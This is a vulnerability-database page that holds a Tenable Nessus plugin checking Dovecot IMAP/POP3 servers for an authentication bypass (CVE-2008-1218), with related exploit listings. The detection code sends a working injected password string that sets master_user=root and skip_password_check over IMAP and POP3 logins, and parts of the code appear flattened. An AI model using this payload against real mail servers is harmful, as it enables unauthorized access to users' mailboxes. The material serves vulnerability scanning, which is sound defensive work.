Dovecot vulnerability allows authentication bypass through argument injection. TAB character used as delimiter in passwords is not properly escaped, enabling unauthorized access to mailboxe
Reporter | Title | Published | Views | Family All 39 |
Packet Storm | dovecot-disclose.txt | 15 Mar 200800:00 | – | packetstorm | | Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit | 1 Jul 201400:00 | – | seebug | | Dovecot IMAP 1.0.10 <= 1.1rc2 Remote Email Disclosure Exploit | 15 Mar 200800:00 | – | seebug |
Exploit DB | Dovecot IMAP 1.0.10 < 1.1rc2 - Remote Email Disclosure | 14 Mar 200800:00 | – | exploitdb |
NVD | CVE-2008-1218 | 10 Mar 200823:44 | – | nvd |
NVD | CVE-2008-1271 | 10 Mar 200821:44 | – | nvd |
CVE | CVE-2008-1218 | 10 Mar 200823:44 | – | cve |
CVE | CVE-2008-1271 | 10 Mar 200821:44 | – | cve | | Dovecot IMAP 1.0.10 <= 1.1rc2 Remote Email Disclosure Exploit | 14 Mar 200800:00 | – | zdt |
OpenVAS | FreeBSD Ports: dovecot | 4 Sep 200800:00 | – | openvas |
# (C) Tenable Network Security, Inc.
if (description)
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_xref(name:"SECUNIA", value:"29295");
script_name(english:"Dovecot passdbs Argument Injection Authentication Bypass");
script_set_attribute(attribute:"synopsis", value:
"The remote mail server is affected by an authentication bypass
script_set_attribute(attribute:"description", value:
"The remote host is running Dovecot, an open source IMAP4 / POP3 server
for Linux / Unix.
The version of Dovecot installed on the remote host uses a TAB
character as a delimiter internally but fails to escape them when they
appear in a password. Provided Dovecot is configured to use a
blocking passdb, an attacker can leverage this issue to bypass
authentication and gain access to a user's mailbox.");
script_set_attribute(attribute:"see_also", value:"");
script_set_attribute(attribute:"solution", value:
"Upgrade to Dovecot v1.0.13 / v1.1.rc3 or later.");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value:"2008/03/14");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:dovecot:dovecot");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_copyright(english:"This script is Copyright (C) 2008-2022 Tenable Network Security, Inc.");
script_require_ports("Services/imap", 143, "Services/pop3", 110);
if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);
# Test IMAP ports.
port = get_kb_item("Services/imap");
if (!port) port = 143;
if (get_port_state(port) && !get_kb_item("imap/false_imap"))
# Unless we're paranoid, make sure the banner corresponds to Dovecot.
# nb: this corresponds to 'login_greeting' in dovecot.conf and
# is configurable.
banner = get_imap_banner(port:port);
if (
report_paranoia > 1 ||
(banner && "dovecot ready" >< tolower(banner))
# Get a list of users to check.
# nb: for the check to work, we must have a valid user who can normally
# authenticate to dovecot; see the discussion about mail users, and
# especially UIDs, at <>.
if (get_kb_item("imap/login")) users = make_list(get_kb_item("imap/login"));
else users = make_list(
# Try to exploit the issue.
pass = string(SCRIPT_NAME, "\tmaster_user=root\tskip_password_check=1");
vuln = FALSE;
foreach user (users)
# Establish a connection.
tag = 0;
soc = open_sock_tcp(port);
if (soc)
s = recv_line(socket:soc, length:1024);
if (strlen(s))
s = chomp(s);
# - try the PLAIN SASL mechanism.
# nb: RFC 3501 requires this be supported by imap4rev1 servers, although
# it may also require SSL / TLS encapsulation.
resp = NULL;
c = strcat("nessus", tag, ' AUTHENTICATE "PLAIN"');
send(socket:soc, data: c+'\r\n');
s = recv_line(socket:soc, length:1024);
s = chomp(s);
if (s == "+")
c = base64(str:raw_string(0, user, 0, pass));
send(socket:soc, data: c+'\r\n');
while (s = recv_line(socket:soc, length:1024))
s = chomp(s);
m = eregmatch(pattern: strcat("^nessus", tag, " (OK|BAD|NO)"), string:s, icase:TRUE);
if (!isnull(m))
resp = m[1];
# There's a problem if we were successful.
if (resp && resp =~ "^OK") vuln = TRUE;
resp = "";
# - if that didn't work, try LOGIN command.
if (!resp)
c = strcat("nessus", tag, " LOGIN ", user, ' "', pass, '"');
send(socket:soc, data: c+'\r\n');
while (s = recv_line(socket:soc, length:1024))
s = chomp(s);
m = eregmatch(pattern:strcat("^nessus", tag, " (OK|BAD|NO)"), string:s, icase:TRUE);
if (!isnull(m))
resp = m[1];
# There's a problem if we were successful.
if (resp && resp =~ "OK") vuln = TRUE;
resp = "";
# Logout.
c = strcat("nessus", tag, " LOGOUT");
send(socket:soc, data: c+'\r\n');
while (s = recv_line(socket:soc, length:1024))
s = chomp(s);
m = eregmatch(pattern: strcat("^nessus", tag, " (OK|BAD|NO)"), string:s, icase:TRUE);
if (!isnull(m))
resp = m[1];
resp = "";
if (vuln)
if (thorough_tests) break;
else exit(0);
# Test POP3 ports.
port = get_service(svc: "pop3", default: 110, exit_on_fail: 1);
if (! get_kb_item("pop3/"+port+"/false_pop3"))
# Unless we're paranoid, make sure the banner corresponds to Dovecot.
banner = get_pop3_banner(port:port);
if (
report_paranoia > 1 ||
(banner && "dovecot ready" >< tolower(banner))
# Get a list of users to check.
# nb: for the check to work, we must have a valid user who can normally
# authenticate to dovecot; see the discussion about mail users, and
# especially UIDs, at <>.
if (get_kb_item("pop3/login")) users = make_list(get_kb_item("pop3/login"));
else users = make_list(
# Try to exploit the issue.
pass = strcat(SCRIPT_NAME, '\tmaster_user=root\tskip_password_check=1');
vuln = FALSE;
foreach user (users)
# Establish a connection.
tag = 0;
soc = open_sock_tcp(port);
if (soc)
s = recv_line(socket:soc, length:1024);
if (strlen(s))
s = chomp(s);
resp = "";
c = strcat("USER ", user);
send(socket:soc, data: c+'\r\n');
while (s = recv_line(socket:soc, length:1024))
s = chomp(s);
m = eregmatch(pattern:"^(\+OK|-ERR)( |$)", string:s, icase:TRUE);
if (!isnull(m))
resp = m[1];
resp = "";
if (resp && resp =~ "OK")
c = strcat("PASS ", pass);
send(socket:soc, data: c+'\r\n');
while (s = recv_line(socket:soc, length:1024))
s = chomp(s);
m = eregmatch(pattern:"^(\+OK|-ERR)( |$)", string:s, icase:TRUE);
if (!isnull(m))
resp = m[1];
# There's a problem if we were successful.
if (resp && resp =~ "^\+OK") vuln = TRUE;
resp = "";
# Logout.
c = "QUIT";
send(socket:soc, data: c+'\r\n');
while (s = recv_line(socket:soc, length:1024))
s = chomp(s);
m = eregmatch(pattern:"^(\+OK|-ERR)( |$)", string:s, icase:TRUE);
if (!isnull(m))
resp = m[1];
resp = "";
if (vuln)
if (thorough_tests) break;
else exit(0);
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